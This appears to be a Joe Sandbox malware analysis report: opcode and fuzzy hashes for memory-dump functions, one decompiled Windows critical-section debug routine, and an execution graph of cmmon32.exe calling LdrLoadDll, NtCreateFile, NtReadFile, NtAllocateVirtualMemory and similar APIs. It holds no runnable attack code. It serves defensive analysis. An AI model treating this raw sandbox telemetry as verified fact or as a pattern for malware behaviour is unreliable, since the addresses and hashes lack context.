                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 30eba1ea1a49aafdba698d782371158642c603fa155bd3e9c4c3cb34fc38a995
                                                                                                                • Instruction ID: 4d8c44683522fc3dfd257e13f6ad949c69dd925fda80af8c35b59d58441d3dd4
                                                                                                                • Opcode Fuzzy Hash: 30eba1ea1a49aafdba698d782371158642c603fa155bd3e9c4c3cb34fc38a995
                                                                                                                • Instruction Fuzzy Hash: 90900271A06140129251715A48146564146A7E07C1B65C021A4904554C89948E55A3E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9520, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d6cb21e408c63f63d5473f893cdf26ad5c3ba6ed2c61e6cc0cab51d0783e5ef
                                                                                                                • Instruction ID: ced2f8239e372936653ca9c34500bfd6c125cad5e50eb0137ef8b63318a1bb3a
                                                                                                                • Opcode Fuzzy Hash: 5d6cb21e408c63f63d5473f893cdf26ad5c3ba6ed2c61e6cc0cab51d0783e5ef
                                                                                                                • Instruction Fuzzy Hash: 939002E1202280924611A25A8404B1A464597E0381B61C026E5444560CC5658C51E175
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9560, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9293b0c567ce8d6dcabe4577ffd2fc3dcc8636ebb6592b455007bfa61064c7be
                                                                                                                • Instruction ID: 11ffcc4ee52aeee07b3093bb2453fd1559df86f304da06b4f7b6b944fe773901
                                                                                                                • Opcode Fuzzy Hash: 9293b0c567ce8d6dcabe4577ffd2fc3dcc8636ebb6592b455007bfa61064c7be
                                                                                                                • Instruction Fuzzy Hash: 24900265222140020256A55A060451B0585A7D63D13A1C025F5806590CC6618C65A361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D96D0, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1df292194f415b54a20a2cd88b300eb21d05835286ab189dd79c72fc0bf6bc25
                                                                                                                • Instruction ID: f6bbe250fe7b07be2ec19043eea7ad9f1b1e80069089951e9171b76e04fc7182
                                                                                                                • Opcode Fuzzy Hash: 1df292194f415b54a20a2cd88b300eb21d05835286ab189dd79c72fc0bf6bc25
                                                                                                                • Instruction Fuzzy Hash: CE90027120214842D211615A4404B56014597E0381F61C026A4514654D8655CC51B561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9610, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 02ac9c711f3644ee7e1dfbc3b7966b0955cf863e86e13f63d828cf34592fe601
                                                                                                                • Instruction ID: 993f40ad9a1477f7234e2e019c5cb11e40bb540ffb703efb7dc228099dec1fdb
                                                                                                                • Opcode Fuzzy Hash: 02ac9c711f3644ee7e1dfbc3b7966b0955cf863e86e13f63d828cf34592fe601
                                                                                                                • Instruction Fuzzy Hash: FF90027160614802D261715A4414756014597D0381F61C021A4414654D87958E55B6E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9650, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c7deb666d0aaf3118d32ceda6ba80d60458089ca7f85e0896bf88930a7107515
                                                                                                                • Instruction ID: db83f53c84fe2cecc58e31dc4cc3ca1058e29122183c0ae2c9458a06b667460a
                                                                                                                • Opcode Fuzzy Hash: c7deb666d0aaf3118d32ceda6ba80d60458089ca7f85e0896bf88930a7107515
                                                                                                                • Instruction Fuzzy Hash: 3D90027120618842D251715A4404A56015597D0385F61C021A4454694D96658D55F6A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009DA710, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: afdab09f39a0dc87cc5fd82091cb8be4378a29da8f9e779d2d6f5b2f25f2c45f
                                                                                                                • Instruction ID: 272a022a0631d68baadcf439825f3554ceed875f94fac419f0be8e50bdc8cfef
                                                                                                                • Opcode Fuzzy Hash: afdab09f39a0dc87cc5fd82091cb8be4378a29da8f9e779d2d6f5b2f25f2c45f
                                                                                                                • Instruction Fuzzy Hash: 02900271302140529611A69A5804A5A424597F0381B61D025A8404554C85948C61A161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9730, Relevance: .0, Instructions: 4COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c8db7d29c0b882e4406e73d83c126a74cd30bc5e1ead91fdaf6c26d0241444d9
                                                                                                                • Instruction ID: 02f02f69db76d0b0644a96220e16910a2ae91fd86e565be855f2e03e7992a5a6
                                                                                                                • Opcode Fuzzy Hash: c8db7d29c0b882e4406e73d83c126a74cd30bc5e1ead91fdaf6c26d0241444d9
                                                                                                                • Instruction Fuzzy Hash: 2190026160614402D251715A5418716015597D0381F61D021A4414554DC6998E55B6E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9670, Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction ID: 6c3ecbcdbfa5b1839768083c60ed88c76218f26ef932fe6f2e32ca0ddd9a9c73
                                                                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A2FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E00A2FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E009DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                0x00a2fdda
                                                                                                                0x00a2fde2
                                                                                                                0x00a2fde5
                                                                                                                0x00a2fdec
                                                                                                                0x00a2fdfa
                                                                                                                0x00a2fdff
                                                                                                                0x00a2fe0a
                                                                                                                0x00a2fe0f
                                                                                                                0x00a2fe17
                                                                                                                0x00a2fe1e
                                                                                                                0x00a2fe19
                                                                                                                0x00a2fe19
                                                                                                                0x00a2fe19
                                                                                                                0x00a2fe20
                                                                                                                0x00a2fe21
                                                                                                                0x00a2fe22
                                                                                                                0x00a2fe25
                                                                                                                0x00a2fe40

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A2FDFA
                                                                                                                Strings
                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A2FE2B
                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A2FE01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                • API String ID: 885266447-3903918235
                                                                                                                • Opcode ID: d4bca438cd9f6cd2cc0acefde1c894bfd3c0892d53b4502edb0400a0b9b3e780
                                                                                                                • Instruction ID: f4d6d559cb06619944ce20de26c6e356124c7c8901800a09c0d7084d2855e4a9
                                                                                                                • Opcode Fuzzy Hash: d4bca438cd9f6cd2cc0acefde1c894bfd3c0892d53b4502edb0400a0b9b3e780
                                                                                                                • Instruction Fuzzy Hash: D5F0FC725405117FD6211B59DD02F337B6AEB84730F154325F614555E1D962FC2097F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Analysis Process: cmmon32.exe PID: 6512 Parent PID: 3388 cmmon32.exeCOMMON

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:4.8%
                                                                                                                Dynamic/Decrypted Code Coverage:2%
                                                                                                                Signature Coverage:0%
                                                                                                                Total number of Nodes:699
                                                                                                                Total number of Limit Nodes:76

                                                                                                                Graph

                                                                                                                execution_graph 31751 3bd06d 31754 3b9860 31751->31754 31755 3b9886 31754->31755 31762 3a8b40 31755->31762 31757 3b9892 31761 3b98b6 31757->31761 31770 3a7e20 31757->31770 31802 3b8510 31761->31802 31763 3a8b4d 31762->31763 31805 3a8a90 31762->31805 31765 3a8b54 31763->31765 31817 3a8a30 31763->31817 31765->31757 31771 3a7e47 31770->31771 32237 3a9ff0 31771->32237 31773 3a7e59 32241 3a9d40 31773->32241 31775 3a7e76 31782 3a7e7d 31775->31782 32292 3a9c70 LdrLoadDll 31775->32292 31777 3a7fc4 31777->31761 31779 3a7ee6 31779->31777 31780 3b9e50 2 API calls 31779->31780 31781 3a7efc 31780->31781 31783 3b9e50 2 API calls 31781->31783 31782->31777 32245 3ad150 31782->32245 31784 3a7f0d 31783->31784 31785 3b9e50 2 API calls 31784->31785 31786 3a7f1e 31785->31786 32257 3aaeb0 31786->32257 31788 3a7f31 31789 3b3a30 8 API calls 31788->31789 31790 3a7f42 31789->31790 31791 3b3a30 8 API calls 31790->31791 31792 3a7f53 31791->31792 31793 3a7f73 31792->31793 32269 3aba20 31792->32269 31795 3b3a30 8 API calls 31793->31795 31797 3a7fbb 31793->31797 31800 3a7f8a 31795->31800 32275 3a7c50 31797->32275 31800->31797 32294 3abac0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31800->32294 31803 3b8dc0 LdrLoadDll 31802->31803 31804 3b852f 31803->31804 31836 3b6a30 31805->31836 31809 3a8aac 31810 3a8ab6 31809->31810 31843 3b9110 31809->31843 31810->31763 31812 3a8af3 31812->31810 31854 3a88b0 31812->31854 31814 3a8b13 31860 3a8300 LdrLoadDll 31814->31860 31816 3a8b25 31816->31763 32212 3b9400 31817->32212 31820 3b9400 LdrLoadDll 31821 3a8a5b 31820->31821 31822 3b9400 LdrLoadDll 31821->31822 31823 3a8a71 31822->31823 31824 3acf50 31823->31824 31825 3acf69 31824->31825 32220 3a9e70 31825->32220 31827 3acf7c 32224 3b8040 31827->32224 31830 3a8b65 31830->31757 31832 3acfa2 31833 3acfcd 31832->31833 32230 3b80c0 31832->32230 31835 3b82f0 2 API calls 31833->31835 31835->31830 31837 3b6a3f 31836->31837 31861 3b3e30 31837->31861 31839 3a8aa3 31840 3b68e0 31839->31840 31867 3b8460 31840->31867 31844 3b9129 31843->31844 31874 3b3a30 31844->31874 31846 3b9141 31847 3b914a 31846->31847 31913 3b8f50 31846->31913 31847->31812 31849 3b915e 31849->31847 31931 3b7d60 31849->31931 32190 3a6e00 31854->32190 31856 3a88d1 31856->31814 31857 3a88ca 31857->31856 32203 3a70c0 31857->32203 31860->31816 31862 3b3e3e 31861->31862 31863 3b3e4a 31861->31863 31862->31863 31866 3b42b0 LdrLoadDll 31862->31866 31863->31839 31865 3b3f9c 31865->31839 31866->31865 31870 3b8dc0 31867->31870 31869 3b68f5 31869->31809 31871 3b8dd0 31870->31871 31872 3b8df2 31870->31872 31873 3b3e30 LdrLoadDll 31871->31873 31872->31869 31873->31872 31875 3b3d65 31874->31875 31877 3b3a44 31874->31877 31875->31846 31877->31875 31939 3b7ab0 31877->31939 31879 3b3b53 32000 3b82c0 LdrLoadDll 31879->32000 31880 3b3b70 31943 3b81c0 31880->31943 31883 3b3b5d 31883->31846 31884 3b3b97 31885 3b9c80 2 API calls 31884->31885 31887 3b3ba3 31885->31887 31886 3b3d29 31889 3b82f0 2 API calls 31886->31889 31887->31883 31887->31886 31888 3b3d3f 31887->31888 31893 3b3c32 31887->31893 32009 3b3770 LdrLoadDll NtReadFile NtClose 31888->32009 31890 3b3d30 31889->31890 31890->31846 31892 3b3d52 31892->31846 31894 3b3c99 31893->31894 31895 3b3c41 31893->31895 31894->31886 31896 3b3cac 31894->31896 31897 3b3c5a 31895->31897 31898 3b3c46 31895->31898 32002 3b8140 31896->32002 31902 3b3c5f 31897->31902 31903 3b3c77 31897->31903 32001 3b3630 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 31898->32001 31946 3b36d0 31902->31946 31903->31890 31958 3b33f0 31903->31958 31905 3b3c50 31905->31846 31907 3b3d0c 32006 3b82f0 31907->32006 31908 3b3c6d 31908->31846 31911 3b3c8f 31911->31846 31912 3b3d18 31912->31846 31914 3b8f61 31913->31914 31915 3b8f73 31914->31915 32029 3b9c00 31914->32029 31915->31849 31917 3b8f94 32032 3b3040 31917->32032 31919 3b8fe0 31919->31849 31920 3b8fb7 31920->31919 31921 3b3040 3 API calls 31920->31921 31923 3b8fd9 31921->31923 31923->31919 32064 3b4370 31923->32064 31924 3b906a 31925 3b907a 31924->31925 32158 3b8d60 LdrLoadDll 31924->32158 32074 3b8bd0 31925->32074 31928 3b90a8 32153 3b7d20 31928->32153 31932 3b8dc0 LdrLoadDll 31931->31932 31933 3b7d7c 31932->31933 32184 45b967a 31933->32184 31934 3b7d97 31936 3b9c80 31934->31936 32187 3b84d0 31936->32187 31938 3b91b9 31938->31812 31940 3b7ac6 31939->31940 31941 3b8dc0 LdrLoadDll 31940->31941 31942 3b3b24 31941->31942 31942->31879 31942->31880 31942->31883 31944 3b81dc NtCreateFile 31943->31944 31945 3b8dc0 LdrLoadDll 31943->31945 31944->31884 31945->31944 31947 3b36ec 31946->31947 31948 3b8140 LdrLoadDll 31947->31948 31949 3b370d 31948->31949 31950 3b3728 31949->31950 31951 3b3714 31949->31951 31953 3b82f0 2 API calls 31950->31953 31952 3b82f0 2 API calls 31951->31952 31954 3b371d 31952->31954 31955 3b3731 31953->31955 31954->31908 32010 3b9e90 31955->32010 31957 3b373c 31957->31908 31959 3b343b 31958->31959 31960 3b346e 31958->31960 31961 3b8140 LdrLoadDll 31959->31961 31962 3b35b9 31960->31962 31965 3b348a 31960->31965 31963 3b3456 31961->31963 31964 3b8140 LdrLoadDll 31962->31964 31966 3b82f0 2 API calls 31963->31966 31970 3b35d4 31964->31970 31967 3b8140 LdrLoadDll 31965->31967 31968 3b345f 31966->31968 31969 3b34a5 31967->31969 31968->31911 31972 3b34ac 31969->31972 31973 3b34c1 31969->31973 32028 3b8180 LdrLoadDll 31970->32028 31975 3b82f0 2 API calls 31972->31975 31976 3b34dc 31973->31976 31977 3b34c6 31973->31977 31974 3b360e 31978 3b82f0 2 API calls 31974->31978 31979 3b34b5 31975->31979 31985 3b34e1 31976->31985 32016 3b9e50 31976->32016 31980 3b82f0 2 API calls 31977->31980 31981 3b3619 31978->31981 31979->31911 31982 3b34cf 31980->31982 31981->31911 31982->31911 31994 3b34f3 31985->31994 32019 3b8270 31985->32019 31986 3b3547 31987 3b355e 31986->31987 32027 3b8100 LdrLoadDll 31986->32027 31989 3b357a 31987->31989 31990 3b3565 31987->31990 31991 3b82f0 2 API calls 31989->31991 31992 3b82f0 2 API calls 31990->31992 31993 3b3583 31991->31993 31992->31994 31995 3b35af 31993->31995 32022 3b9a50 31993->32022 31994->31911 31995->31911 31997 3b359a 31998 3b9c80 2 API calls 31997->31998 31999 3b35a3 31998->31999 31999->31911 32000->31883 32001->31905 32003 3b8dc0 LdrLoadDll 32002->32003 32004 3b3cf4 32003->32004 32005 3b8180 LdrLoadDll 32004->32005 32005->31907 32007 3b8dc0 LdrLoadDll 32006->32007 32008 3b830c NtClose 32007->32008 32008->31912 32009->31892 32013 3b8490 32010->32013 32012 3b9eaa 32012->31957 32014 3b8dc0 LdrLoadDll 32013->32014 32015 3b84ac RtlAllocateHeap 32014->32015 32015->32012 32017 3b8490 2 API calls 32016->32017 32018 3b9e68 32017->32018 32018->31985 32020 3b8dc0 LdrLoadDll 32019->32020 32021 3b828c NtReadFile 32020->32021 32021->31986 32023 3b9a5d 32022->32023 32024 3b9a74 32022->32024 32023->32024 32025 3b9e50 2 API calls 32023->32025 32024->31997 32026 3b9a8b 32025->32026 32026->31997 32027->31987 32028->31974 32030 3b9c2d 32029->32030 32159 3b83a0 32029->32159 32030->31917 32033 3b3051 32032->32033 32034 3b3059 32032->32034 32033->31920 32035 3b332c 32034->32035 32162 3bae30 32034->32162 32035->31920 32037 3b30ad 32038 3bae30 2 API calls 32037->32038 32041 3b30b8 32038->32041 32039 3b3106 32042 3bae30 2 API calls 32039->32042 32041->32039 32043 3baf60 3 API calls 32041->32043 32176 3baed0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 32041->32176 32045 3b311a 32042->32045 32043->32041 32044 3b3177 32046 3bae30 2 API calls 32044->32046 32045->32044 32167 3baf60 32045->32167 32048 3b318d 32046->32048 32049 3b31ca 32048->32049 32051 3baf60 3 API calls 32048->32051 32050 3bae30 2 API calls 32049->32050 32052 3b31d5 32050->32052 32051->32048 32053 3baf60 3 API calls 32052->32053 32060 3b320f 32052->32060 32053->32052 32056 3bae90 2 API calls 32057 3b330e 32056->32057 32058 3bae90 2 API calls 32057->32058 32059 3b3318 32058->32059 32061 3bae90 2 API calls 32059->32061 32173 3bae90 32060->32173 32062 3b3322 32061->32062 32063 3bae90 2 API calls 32062->32063 32063->32035 32065 3b4381 32064->32065 32066 3b3a30 8 API calls 32065->32066 32068 3b4397 32066->32068 32067 3b43ea 32067->31924 32068->32067 32069 3b43d2 32068->32069 32070 3b43e5 32068->32070 32072 3b9c80 2 API calls 32069->32072 32071 3b9c80 2 API calls 32070->32071 32071->32067 32073 3b43d7 32072->32073 32073->31924 32177 3b8a90 32074->32177 32077 3b8a90 LdrLoadDll 32078 3b8bed 32077->32078 32079 3b8a90 LdrLoadDll 32078->32079 32080 3b8bf6 32079->32080 32081 3b8a90 LdrLoadDll 32080->32081 32082 3b8bff 32081->32082 32083 3b8a90 LdrLoadDll 32082->32083 32084 3b8c08 32083->32084 32085 3b8a90 LdrLoadDll 32084->32085 32086 3b8c11 32085->32086 32087 3b8a90 LdrLoadDll 32086->32087 32088 3b8c1d 32087->32088 32089 3b8a90 LdrLoadDll 32088->32089 32090 3b8c26 32089->32090 32091 3b8a90 LdrLoadDll 32090->32091 32092 3b8c2f 32091->32092 32093 3b8a90 LdrLoadDll 32092->32093 32094 3b8c38 32093->32094 32095 3b8a90 LdrLoadDll 32094->32095 32096 3b8c41 32095->32096 32097 3b8a90 LdrLoadDll 32096->32097 32098 3b8c4a 32097->32098 32099 3b8a90 LdrLoadDll 32098->32099 32100 3b8c56 32099->32100 32101 3b8a90 LdrLoadDll 32100->32101 32102 3b8c5f 32101->32102 32103 3b8a90 LdrLoadDll 32102->32103 32104 3b8c68 32103->32104 32105 3b8a90 LdrLoadDll 32104->32105 32106 3b8c71 32105->32106 32107 3b8a90 LdrLoadDll 32106->32107 32108 3b8c7a 32107->32108 32109 3b8a90 LdrLoadDll 32108->32109 32110 3b8c83 32109->32110 32111 3b8a90 LdrLoadDll 32110->32111 32112 3b8c8f 32111->32112 32113 3b8a90 LdrLoadDll 32112->32113 32114 3b8c98 32113->32114 32115 3b8a90 LdrLoadDll 32114->32115 32116 3b8ca1 32115->32116 32117 3b8a90 LdrLoadDll 32116->32117 32118 3b8caa 32117->32118 32119 3b8a90 LdrLoadDll 32118->32119 32120 3b8cb3 32119->32120 32121 3b8a90 LdrLoadDll 32120->32121 32122 3b8cbc 32121->32122 32123 3b8a90 LdrLoadDll 32122->32123 32124 3b8cc8 32123->32124 32125 3b8a90 LdrLoadDll 32124->32125 32126 3b8cd1 32125->32126 32127 3b8a90 LdrLoadDll 32126->32127 32128 3b8cda 32127->32128 32129 3b8a90 LdrLoadDll 32128->32129 32130 3b8ce3 32129->32130 32131 3b8a90 LdrLoadDll 32130->32131 32132 3b8cec 32131->32132 32133 3b8a90 LdrLoadDll 32132->32133 32134 3b8cf5 32133->32134 32135 3b8a90 LdrLoadDll 32134->32135 32136 3b8d01 32135->32136 32137 3b8a90 LdrLoadDll 32136->32137 32138 3b8d0a 32137->32138 32139 3b8a90 LdrLoadDll 32138->32139 32140 3b8d13 32139->32140 32141 3b8a90 LdrLoadDll 32140->32141 32142 3b8d1c 32141->32142 32143 3b8a90 LdrLoadDll 32142->32143 32144 3b8d25 32143->32144 32145 3b8a90 LdrLoadDll 32144->32145 32146 3b8d2e 32145->32146 32147 3b8a90 LdrLoadDll 32146->32147 32148 3b8d3a 32147->32148 32149 3b8a90 LdrLoadDll 32148->32149 32150 3b8d43 32149->32150 32151 3b8a90 LdrLoadDll 32150->32151 32152 3b8d4c 32151->32152 32152->31928 32154 3b8dc0 LdrLoadDll 32153->32154 32155 3b7d3c 32154->32155 32183 45b9860 LdrInitializeThunk 32155->32183 32156 3b7d53 32156->31849 32158->31925 32160 3b8dc0 LdrLoadDll 32159->32160 32161 3b83bc NtAllocateVirtualMemory 32160->32161 32161->32030 32163 3bae40 32162->32163 32164 3bae46 32162->32164 32163->32037 32165 3b9e50 2 API calls 32164->32165 32166 3bae6c 32165->32166 32166->32037 32168 3baed0 32167->32168 32169 3b9e50 2 API calls 32168->32169 32171 3baf2d 32168->32171 32170 3baf0a 32169->32170 32172 3b9c80 2 API calls 32170->32172 32171->32045 32172->32171 32174 3b9c80 2 API calls 32173->32174 32175 3b3304 32174->32175 32175->32056 32176->32041 32178 3b8aab 32177->32178 32179 3b3e30 LdrLoadDll 32178->32179 32180 3b8acb 32179->32180 32181 3b3e30 LdrLoadDll 32180->32181 32182 3b8b77 32180->32182 32181->32182 32182->32077 32183->32156 32185 45b968f LdrInitializeThunk 32184->32185 32186 45b9681 32184->32186 32185->31934 32186->31934 32188 3b8dc0 LdrLoadDll 32187->32188 32189 3b84ec RtlFreeHeap 32188->32189 32189->31938 32191 3a6e0b 32190->32191 32192 3a6e10 32190->32192 32191->31857 32193 3b9c00 2 API calls 32192->32193 32200 3a6e35 32193->32200 32194 3a6e98 32194->31857 32195 3b7d20 2 API calls 32195->32200 32196 3a6e9e 32197 3a6ec4 32196->32197 32199 3b8420 2 API calls 32196->32199 32197->31857 32201 3a6eb5 32199->32201 32200->32194 32200->32195 32200->32196 32202 3b9c00 2 API calls 32200->32202 32206 3b8420 32200->32206 32201->31857 32202->32200 32204 3b8420 2 API calls 32203->32204 32205 3a70de 32203->32205 32204->32205 32205->31814 32207 3b8dc0 LdrLoadDll 32206->32207 32208 3b843c 32207->32208 32211 45b96e0 LdrInitializeThunk 32208->32211 32209 3b8453 32209->32200 32211->32209 32213 3b9423 32212->32213 32216 3a9b20 32213->32216 32217 3a9b44 32216->32217 32218 3a9b80 LdrLoadDll 32217->32218 32219 3a8a4a 32217->32219 32218->32219 32219->31820 32221 3a9e93 32220->32221 32223 3a9f10 32221->32223 32235 3b7af0 LdrLoadDll 32221->32235 32223->31827 32225 3b8dc0 LdrLoadDll 32224->32225 32226 3acf8b 32225->32226 32226->31830 32227 3b8630 32226->32227 32228 3b8dc0 LdrLoadDll 32227->32228 32229 3b864f LookupPrivilegeValueW 32228->32229 32229->31832 32231 3b8dc0 LdrLoadDll 32230->32231 32232 3b80dc 32231->32232 32236 45b9910 LdrInitializeThunk 32232->32236 32233 3b80fb 32233->31833 32235->32223 32236->32233 32238 3aa017 32237->32238 32239 3a9e70 LdrLoadDll 32238->32239 32240 3aa046 32239->32240 32240->31773 32242 3a9d64 32241->32242 32295 3b7af0 LdrLoadDll 32242->32295 32244 3a9d9e 32244->31775 32246 3ad17c 32245->32246 32247 3a9ff0 LdrLoadDll 32246->32247 32248 3ad18e 32247->32248 32296 3ad060 32248->32296 32251 3ad1a9 32253 3ad1b4 32251->32253 32255 3b82f0 2 API calls 32251->32255 32252 3ad1c1 32254 3ad1d2 32252->32254 32256 3b82f0 2 API calls 32252->32256 32253->31779 32254->31779 32255->32253 32256->32254 32258 3aaec6 32257->32258 32259 3aaed0 32257->32259 32258->31788 32260 3a9e70 LdrLoadDll 32259->32260 32261 3aaf41 32260->32261 32262 3a9d40 LdrLoadDll 32261->32262 32263 3aaf55 32262->32263 32264 3aaf78 32263->32264 32265 3a9e70 LdrLoadDll 32263->32265 32264->31788 32266 3aaf94 32265->32266 32267 3b3a30 8 API calls 32266->32267 32268 3aafe9 32267->32268 32268->31788 32270 3aba46 32269->32270 32271 3a9e70 LdrLoadDll 32270->32271 32272 3aba5a 32271->32272 32315 3ab710 32272->32315 32274 3a7f6c 32293 3ab000 LdrLoadDll 32274->32293 32344 3ad410 32275->32344 32277 3a7c63 32288 3a7e11 32277->32288 32349 3b3380 32277->32349 32279 3a7cc2 32279->32288 32352 3a7a00 32279->32352 32282 3bae30 2 API calls 32283 3a7d09 32282->32283 32284 3baf60 3 API calls 32283->32284 32289 3a7d1e 32284->32289 32285 3a6e00 4 API calls 32285->32289 32288->31777 32289->32285 32289->32288 32291 3a70c0 2 API calls 32289->32291 32357 3aabe0 32289->32357 32407 3ad3b0 32289->32407 32411 3ace90 21 API calls 32289->32411 32291->32289 32292->31782 32293->31793 32294->31797 